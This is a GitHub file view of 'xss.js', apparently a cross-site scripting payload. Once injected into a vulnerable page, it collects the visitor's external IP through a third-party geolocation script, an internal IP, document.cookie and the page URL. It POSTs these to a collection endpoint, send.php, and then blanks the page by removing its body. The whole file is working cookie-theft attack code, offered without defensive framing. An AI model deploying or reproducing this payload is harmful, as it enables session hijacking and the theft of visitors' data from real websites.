-
Notifications
You must be signed in to change notification settings - Fork 14
/
xss.js
74 lines (65 loc) · 2.02 KB
/
xss.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
alert = function() {};
a = document.createElement('script');
a.src = "https://pv.sohu.com/cityjson";
document.body.appendChild(a);
a = document.createElement("script");
a.src = ""
document.body.appendChild(a);
function formatParams(data) {
var arr = [];
for (var name in data) {
arr.push(encodeURIComponent(name) + "=" + encodeURIComponent(data[name]));
}
return arr.join("&");
}
function ajax(options) {
options = options || {};
options.type = (options.type || "GET").toUpperCase();
options.dataType = options.dataType || "json";
var params = formatParams(options.data);
if (window.XMLHttpRequest) {
var xhr = new XMLHttpRequest();
} else {
var xhr = new ActiveXObject('Microsoft.XMLHTTP');
}
xhr.onreadystatechange = function () {
if (xhr.readyState == 4) {
var status = xhr.status;
if (status >= 200 && status < 300) {
options.success && options.success(xhr.responseText, xhr.responseXML);
} else {
options.fail && options.fail(status);
}
}
}
if (options.type == "GET") {
xhr.open("GET", options.url + "?" + params, true);
xhr.send(null);
} else if (options.type == "POST") {
xhr.open("POST", options.url, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(params);
}
}
function f(){
exip = returnCitySN['cip'];
inip = IN_IP["ip"];
cookie = document.cookie;
domain = document.location.href;
//alert("external ip : [" + exip + "]");
//alert("internal ip : [" + inip + "]");
//alert("vul domain : [" + domain + "]");
ajax({
url: "http://localhost/send.php",
type: "POST",
data: {"exip": exip, "domain": domain, "inip": inip, "cookie": cookie},
dataType: "",
success: function (response, xml) {
},
fail: function (status) {
}
});
ajax = function() {};
document.body.remove();
}
window.setTimeout(f, 500)